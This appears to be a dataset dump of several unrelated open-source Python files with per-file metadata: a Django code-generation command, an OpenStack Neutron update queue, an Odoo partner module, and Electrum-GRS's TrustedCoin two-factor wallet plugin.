help = ("Generates generic views (create, update, detail, list, and delete), urls, forms, and admin for model in an"
"app. Optionally can restrict which apps are generated on a per app basis.\n\nexample: python manage.py "
"bake bread:Sesame,Pumpkernickel donut:Glazed,Chocolate")
def handle(self, *args, **options):
ingredients = self.parse_bake_options(*args)
baker = Baker()
baker.bake(ingredients)
def parse_bake_options(self, *args):
"""
Parses command line options to determine what apps and models for those apps we should bake.
"""
apps_and_models_to_bake = {}
for arg in args:
app_and_model_names = arg.split(':')
app_label = app_and_model_names[0]
if len(app_and_model_names) == 2:
selected_model_names = app_and_model_names[1].split(",")
else:
selected_model_names = None
app, models = self.get_app_and_models(app_label, selected_model_names)
apps_and_models_to_bake[app_label] = models
return apps_and_models_to_bake
def get_app_and_models(self, app_label, model_names):
"""
Gets the app and models when given app_label and model names
"""
try:
app = get_app(app_label)
except ImproperlyConfigured:
raise CommandError("%s is ImproperlyConfigured - did you remember to add %s to settings.INSTALLED_APPS?" %
(app_label, app_label))
models = self.get_selected_models(app, app_label, model_names)
return (app, models)
def get_selected_models(self, app, app_label, model_names):
"""
Returns the model for a given app. If given model_names, returns those so long as the model names are
actually models in the given app.
"""
if model_names:
try:
print(app_label, model_names)
return [get_model(app_label, model_name) for model_name in model_names]
except:
raise CommandError("One or more of the models you entered for %s are incorrect." % app_label)
else:
return get_models(app)
|
bsd-3-clause
| 8,704,876,466,907,126,000
| 42.933333
| 120
| 0.616844
| false
| 3.975867
| false
| false
| false
|
noironetworks/neutron
|
neutron/agent/common/resource_processing_queue.py
|
1
|
6194
|
# Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import datetime
from oslo_utils import timeutils
from six.moves import queue as Queue
class ResourceUpdate(object):
"""Encapsulates a resource update
An instance of this object carries the information necessary to prioritize
and process a request to update a resource.
Priority values are ordered from higher (0) to lower (>0) by the caller,
and are therefore not defined here, but must be done by the consumer.
"""
def __init__(self, id, priority,
action=None, resource=None, timestamp=None, tries=5):
self.priority = priority
self.timestamp = timestamp
if not timestamp:
self.timestamp = timeutils.utcnow()
self.id = id
self.action = action
self.resource = resource
self.tries = tries
def __lt__(self, other):
"""Implements priority among updates
Lower numerical priority always gets precedence. When comparing two
updates of the same priority then the one with the earlier timestamp
gets precedence. In the unlikely event that the timestamps are also
equal it falls back to a simple comparison of ids meaning the
precedence is essentially random.
"""
if self.priority != other.priority:
return self.priority < other.priority
if self.timestamp != other.timestamp:
return self.timestamp < other.timestamp
return self.id < other.id
def hit_retry_limit(self):
return self.tries < 0
class ExclusiveResourceProcessor(object):
"""Manager for access to a resource for processing
This class controls access to a resource in a non-blocking way. The first
instance to be created for a given ID is granted exclusive access to
the resource.
Other instances may be created for the same ID while the first
instance has exclusive access. If that happens then it doesn't block and
wait for access. Instead, it signals to the master instance that an update
came in with the timestamp.
This way, a thread will not block to wait for access to a resource.
Instead it effectively signals to the thread that is working on the
resource that something has changed since it started working on it.
That thread will simply finish its current iteration and then repeat.
This class keeps track of the last time that resource data was fetched and
processed. The timestamp that it keeps must be before when the data used
to process the resource last was fetched from the database. But, as close
as possible. The timestamp should not be recorded, however, until the
resource has been processed using the fetch data.
"""
_masters = {}
_resource_timestamps = {}
def __init__(self, id):
self._id = id
if id not in self._masters:
self._masters[id] = self
self._queue = []
self._master = self._masters[id]
def _i_am_master(self):
return self == self._master
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self._i_am_master():
del self._masters[self._id]
def _get_resource_data_timestamp(self):
return self._resource_timestamps.get(self._id,
datetime.datetime.min)
def fetched_and_processed(self, timestamp):
"""Records the timestamp after it is used to update the resource"""
new_timestamp = max(timestamp, self._get_resource_data_timestamp())
self._resource_timestamps[self._id] = new_timestamp
def queue_update(self, update):
"""Queues an update from a worker
This is the queue used to keep new updates that come in while a
resource is being processed. These updates have already bubbled to
the front of the ResourceProcessingQueue.
"""
self._master._queue.append(update)
def updates(self):
"""Processes the resource until updates stop coming
Only the master instance will process the resource. However, updates
may come in from other workers while it is in progress. This method
loops until they stop coming.
"""
if self._i_am_master():
while self._queue:
# Remove the update from the queue even if it is old.
update = self._queue.pop(0)
# Process the update only if it is fresh.
if self._get_resource_data_timestamp() < update.timestamp:
yield update
class ResourceProcessingQueue(object):
"""Manager of the queue of resources to process."""
def __init__(self):
self._queue = Queue.PriorityQueue()
def add(self, update):
update.tries -= 1
self._queue.put(update)
def each_update_to_next_resource(self):
"""Grabs the next resource from the queue and processes
This method uses a for loop to process the resource repeatedly until
updates stop bubbling to the front of the queue.
"""
next_update = self._queue.get()
with ExclusiveResourceProcessor(next_update.id) as rp:
# Queue the update whether this worker is the master or not.
rp.queue_update(next_update)
# Here, if the current worker is not the master, the call to
# rp.updates() will not yield and so this will essentially be a
# noop.
for update in rp.updates():
yield (rp, update)
|
apache-2.0
| 4,223,049,414,664,777,700
| 36.539394
| 79
| 0.652406
| false
| 4.584752
| false
| false
| false
|
open-synergy/opnsynid-partner-contact
|
partner_app/models/res_partner.py
|
1
|
1107
|
# -*- coding: utf-8 -*-
# Copyright 2017 OpenSynergy Indonesia
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from openerp import models, api
class ResPartner(models.Model):
_inherit = "res.partner"
@api.multi
def button_toggle_customer(self):
for partner in self:
partner._toggle_customer()
@api.multi
def button_toggle_supplier(self):
for partner in self:
partner._toggle_supplier()
@api.multi
def _toggle_customer(self):
self.ensure_one()
criteria = [
"|",
("id", "=", self.id),
("commercial_partner_id", "=", self.id),
]
self.env["res.partner"].search(criteria).write({
"customer": not self.customer,
})
@api.multi
def _toggle_supplier(self):
self.ensure_one()
criteria = [
"|",
("id", "=", self.id),
("commercial_partner_id", "=", self.id),
]
self.env["res.partner"].search(criteria).write({
"supplier": not self.supplier,
})
|
agpl-3.0
| -3,164,423,185,243,750,400
| 24.744186
| 63
| 0.528455
| false
| 3.817241
| false
| false
| false
|
GroestlCoin/electrum-grs
|
electrum_grs/plugins/trustedcoin/trustedcoin.py
|
1
|
31657
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import json
import base64
import time
import hashlib
from collections import defaultdict
from typing import Dict, Union
from urllib.parse import urljoin
from urllib.parse import quote
from aiohttp import ClientResponse
from electrum_grs import ecc, constants, keystore, version, bip32, bitcoin
from electrum_grs.bitcoin import TYPE_ADDRESS
from electrum_grs.bip32 import BIP32Node, xpub_type
from electrum_grs.crypto import sha256
from electrum_grs.transaction import TxOutput
from electrum_grs.mnemonic import Mnemonic, seed_type, is_any_2fa_seed_type
from electrum_grs.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum_grs.i18n import _
from electrum_grs.plugin import BasePlugin, hook
from electrum_grs.util import NotEnoughFunds, UserFacingException
from electrum_grs.storage import STO_EV_USER_PW
from electrum_grs.network import Network
from electrum_grs.base_wizard import BaseWizard
from electrum_grs.logging import Logger
def get_signing_xpub(xtype):
if not constants.net.TESTNET:
xpub = "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
else:
xpub = "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
if xtype not in ('standard', 'p2wsh'):
raise NotImplementedError('xtype: {}'.format(xtype))
if xtype == 'standard':
return xpub
node = BIP32Node.from_xkey(xpub)
return node._replace(xtype=xtype).to_xpub()
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
def __init__(self, reason: Union[str, Exception] = None):
self.reason = reason
def __str__(self):
header = _("Error connecting to {} server").format('TrustedCoin')
reason = self.reason
if isinstance(reason, BaseException):
reason = repr(reason)
return f"{header}:\n{reason}" if reason else header
class TrustedCoinCosignerClient(Logger):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
Logger.__init__(self)
async def handle_response(self, resp: ClientResponse):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
def send_request(self, method, relative_url, data=None, *, timeout=None):
network = Network.get_instance()
if not network:
raise ErrorConnectingServer('You are offline.')
url = urljoin(self.base_url, relative_url)
if self.debug:
self.logger.debug(f'<-- {method} {url} {data}')
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
if method == 'get':
response = Network.send_http_on_proxy(method, url,
params=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
elif method == 'post':
response = Network.send_http_on_proxy(method, url,
json=data,
headers=headers,
on_finish=self.handle_response,
timeout=timeout)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
else:
if self.debug:
self.logger.debug(f'--> {response}')
return response
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload,
timeout=60)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = {
'legacy': self.storage.get('trustedcoin_billing_addresses', {}),
'segwit': self.storage.get('trustedcoin_billing_addresses_segwit', {})
}
self._billing_addresses = {} # type: Dict[str, Dict[int, str]] # addr_type -> index -> addr
self._billing_addresses_set = set() # set of addrs
for addr_type, d in list(billing_addresses.items()):
self._billing_addresses[addr_type] = {}
# convert keys from str to int
for index, addr in d.items():
self._billing_addresses[addr_type][int(index)] = addr
self._billing_addresses_set.add(addr)
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address_segwit']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.logger.info("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize()
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.storage.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(storage):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = storage.get('x1/')['xpub']
xpub2 = storage.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return bitcoin.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return bitcoin.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
# Not available for GRS.
return False
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_2fa_segwit_seed', _('Segwit 2FA')),
('create_2fa_seed', _('Legacy 2FA')),
]
wizard.choose_seed_type(choices=choices)
def create_2fa_seed(self, wizard): self.create_seed(wizard, '2fa')
def create_2fa_segwit_seed(self, wizard): self.create_seed(wizard, '2fa_segwit')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
# old version use long seed phrases
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == '2fa' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != '2fa':
return
if not storage.get('x1/'):
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
|
gpl-3.0
| -3,658,117,888,799,464,400
| 41.041169
| 139
| 0.603468
| false
| 3.674637
| false
| false
| false
|
jkibele/benthic_photo_survey
|
bps_package/photo_tagging.py
|
1
|
24681
|
import pyexiv2 as exiv # see note about pyexiv2 in notes.txt
